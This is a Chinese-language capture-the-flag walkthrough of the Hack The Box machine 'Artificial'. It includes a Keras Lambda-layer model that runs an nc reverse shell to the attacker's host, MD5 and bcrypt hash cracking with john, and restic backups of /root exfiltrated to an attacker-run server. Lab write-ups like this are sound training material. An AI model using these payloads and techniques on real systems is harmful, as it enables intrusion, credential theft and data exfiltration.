Nmap #
[root@kali] /home/kali/Artificial
❯ nmap Artificial.htb -sV -A
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7c:e4:8d:84:c5:de:91:3a:5a:2b:9d:34:ed:d6:99:17 (RSA)
| 256 83:46:2d:cf:73:6d:28:6f:11:d5:1d:b4:88:20:d6:7c (ECDSA)
|_ 256 e3:18:2e:3b:40:61:b4:59:87:e8:4a:29:24:0f:6a:fc (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Artificial - AI Solutions
|_http-server-header: nginx/1.18.0 (Ubuntu)
TensorFlow RCE #
随意注册一个用户,进入到上传页面,得到requirement.txt和dockerfile
// dockerfile
FROM python:3.8-slim
WORKDIR /code
RUN apt-get update && \
apt-get install -y curl && \
curl -k -LO https://files.pythonhosted.org/packages/65/ad/4e090ca3b4de53404df9d1247c8a371346737862cfe539e7516fd23149a4/tensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl && \
rm -rf /var/lib/apt/lists/*
RUN pip install ./tensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl
ENTRYPOINT ["/bin/bash"]
// requirement.txt
tensorflow-cpu==2.13.1
尽可能使用给出的dockerfile来搭建环境!!,不然可能收不到反弹
[root@kali] /home/kali/Artificial
❯ docker build -t my-tf-image .
[+] Building 63.8s (8/8) FINISHED docker:default
=> [internal] load build definition from Dockerfile 0.0s
=> => transferring dockerfile: 540B 0.0s
=> [internal] load metadata for docker.io/library/python:3.8-slim 15.0s
=> [internal] load .dockerignore 0.0s
=> => transferring context: 2B 0.0s
=> [1/4] FROM docker.io/library/python:3.8-slim@sha256:1d52838af602b4b5a831beb13a0e4d073280665ea7be7f69ce2382f29c5a613f 0.0s
=> CACHED [2/4] WORKDIR /code 0.0s
=> CACHED [3/4] RUN apt-get update && apt-get install -y curl && curl -k -LO https://files.pythonhosted.org/packages/65/ad/4e090 0.0s
=> [4/4] RUN pip install ./tensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl -i https://pypi.mirrors.ustc. 43.3s
=> exporting to image 5.5s
=> => exporting layers 5.5s
=> => writing image sha256:3ce3493863cf4d877a17cb49f6153636af12fdd54a2b3ed3623e5d933ff8abff 0.0s
=> => naming to docker.io/library/my-tf-image 0.0s
参考这篇文章👇
import tensorflow as tf
def exploit(x):
import os
os.system("rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.47 6666 >/tmp/f")
return x
model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
model.add(tf.keras.layers.Lambda(exploit))
model.compile()
model.save("exploit.h5")
上传之后,点击View Predictions即可获得反弹shell
Own gael #
查看到有一个user.db的数据库文件,里面有用户表
app@artificial:~/app/instance$ sqlite3 users.db
Enter ".help" for usage hints.
sqlite> select * from user;
1|gael|gael@artificial.htb|c99175974b6e192936d97224638a34f8
2|mark|mark@artificial.htb|0f3d8c76530022670f1c6029eed09ccb
3|robert|robert@artificial.htb|b606c5f5136170f15444251665638b36
4|royer|royer@artificial.htb|bc25b1f80f544c0ab451c02a3dca9fc6
5|mary|mary@artificial.htb|bf041041e57f1aff3be7ea1abd6129d0
6|notthei0204|notthei0204@gmail.com|f0f1f60430a59e920764a7b1be6041fc
7|test123@gmail.com|test123@gmail.com|9a93efa79aa9f5d35e14bc55a3e16dc4
8|n|n@n.com|7b8b965ad4bca0e41ab51de7b31363a1
9|test|test@email.com|098f6bcd4621d373cade4e832627b4f6
10|dd|dd@gmail.com|827ccb0eea8a706c4c34a16891f84e7b
11|ddd|ddd@gmail.com|77963b7a931377ad4ab5ad6a9cd718aa
使用john爆破
[root@kali] /home/kali/Artificial
❯ cat hash.txt
c99175974b6e192936d97224638a34f8
[root@kali] /home/kali/Artificial
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-md5
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
mattp005numbertwo (?)
1g 0:00:00:00 DONE (2025-06-23 04:46) 3.448g/s 19728Kp/s 19728Kc/s 19728KC/s mattpapa..mattne
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
Root #
在/opt目录下发现线索,并且找到了备份文件
gael@artificial:/var/backups$ ls -al
total 51228
drwxr-xr-x 2 root root 4096 Jun 9 09:03 .
drwxr-xr-x 13 root root 4096 Jun 2 07:38 ..
-rw-r--r-- 1 root root 39386 Jun 9 09:02 apt.extended_states.0
-rw-r--r-- 1 root root 4206 Jun 2 07:42 apt.extended_states.1.gz
-rw-r--r-- 1 root root 4190 May 27 13:07 apt.extended_states.2.gz
-rw-r--r-- 1 root root 4383 Oct 27 2024 apt.extended_states.3.gz
-rw-r--r-- 1 root root 4379 Oct 19 2024 apt.extended_states.4.gz
-rw-r--r-- 1 root root 4367 Oct 14 2024 apt.extended_states.5.gz
-rw-r--r-- 1 root root 4356 Sep 22 2024 apt.extended_states.6.gz
-rw-r----- 1 root sysadm 52357120 Mar 4 22:19 backrest_backup.tar.gz
gael@artificial:/var/backups$ id
uid=1000(gael) gid=1000(gael) groups=1000(gael),1007(sysadm)
gael@artificial:/var/backups$
刚好有读取权限,将其传到本机,发现有一个密码哈希
[root@kali] /home/kali/Artificial/backrest/.config/backrest
❯ cat config.json
{
"modno": 2,
"version": 4,
"instance": "Artificial",
"auth": {
"disabled": false,
"users": [
{
"name": "backrest_root",
"passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"
}
]
}
}
虽然说是bcrypt,但是还是要先base64解密一次
[root@kali] /home/kali/Artificial
❯ cat hash.txt| base64 -d
$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO
继续使用john爆破
[root@kali] /home/kali/Artificial
❯ cat hash.txt
$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO
[root@kali] /home/kali/Artificial
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!@#$%^ (?)
1g 0:00:00:15 DONE (2025-06-23 05:01) 0.06544g/s 353.4p/s 353.4c/s 353.4C/s lightbulb..huevos
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
注意到内网端口9898是开放的,将其转出来
gael@artificial:~$ ss -tuln
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 2048 127.0.0.1:5000 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:9898 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 [::]:80 [::]:*
tcp LISTEN 0 128 [::]:22 [::]:*
[root@kali] /home/kali/Artificial
❯ ssh gael@10.10.11.74 -L 9898:127.0.0.1:9898
进行登录
先要在kali上开启服务,然后在靶机上进行备份到kali
[root@kali] /home/kali/Artificial/rest-server_0.14.0_linux_amd64
❯ ./rest-server --path /tmp/restic-data --listen :12345 --no-auth
Data directory: /tmp/restic-data
Authentication disabled
Append only mode disabled
Private repositories disabled
Group accessible repos disabled
start server on [::]:12345
Creating repository directories in /tmp/restic-data/myrepo
然后执行命令
// init repo
-r rest:http://10.10.16.47:12345/myrepo init
// backup /root to remote
-r rest:http://10.10.16.47:12345/myrepo backup /root
查看备份到本地的快照
[root@kali] /tmp/restic-data/myrepo
❯ restic -r /tmp/restic-data/myrepo snapshots
enter password for repository:
repository 4235bb1f opened (version 2, compression level auto)
created new cache in /root/.cache/restic
ID Time Host Tags Paths Size
-----------------------------------------------------------------------
b3112b8a 2025-06-23 05:17:15 artificial /root 4.299 MiB
-----------------------------------------------------------------------
1 snapshots
进行恢复快照
[root@kali] /tmp/restic-data/myrepo
❯ restic -r /tmp/restic-data/myrepo restore b3112b8a --target ./restore ⏎
enter password for repository:
repository 4235bb1f opened (version 2, compression level auto)
[0:00] 100.00% 1 / 1 index files loaded
restoring snapshot b3112b8a of [/root] at 2025-06-23 09:17:15.090371306 +0000 UTC by root@artificial to ./restore
Summary: Restored 80 files/dirs (4.299 MiB) in 0:00
然后就能拿到root.txt
[root@kali] /tmp/restic-data/myrepo/restore/root
❯ ls -al
total 12
drwx------ 6 root root 220 Jun 23 05:10 .
drwx------ 3 root root 60 Jun 23 05:43 ..
lrwxrwxrwx 1 root root 9 Jun 9 05:37 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwxr-xr-x 3 root root 80 Mar 3 16:52 .cache
drwxr-xr-x 3 root root 60 Oct 18 2024 .local
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
lrwxrwxrwx 1 root root 9 Oct 18 2024 .python_history -> /dev/null
-rw-r----- 1 root root 33 Jun 23 04:31 root.txt
drwxr-xr-x 2 root root 80 Jun 9 09:57 scripts
drwx------ 2 root root 80 Mar 4 17:40 .ssh
当然也可以登录上去了
[root@kali] /tmp/restic-data/myrepo/restore/root/.ssh
❯ ssh -i ./id_rsa root@Artificial.htb
Summary #
User: 就是一个简单的模型RCE,然后爆破密码。
Root: 压缩包备份得到密码哈希,爆破后转发端口,将/root备份到kali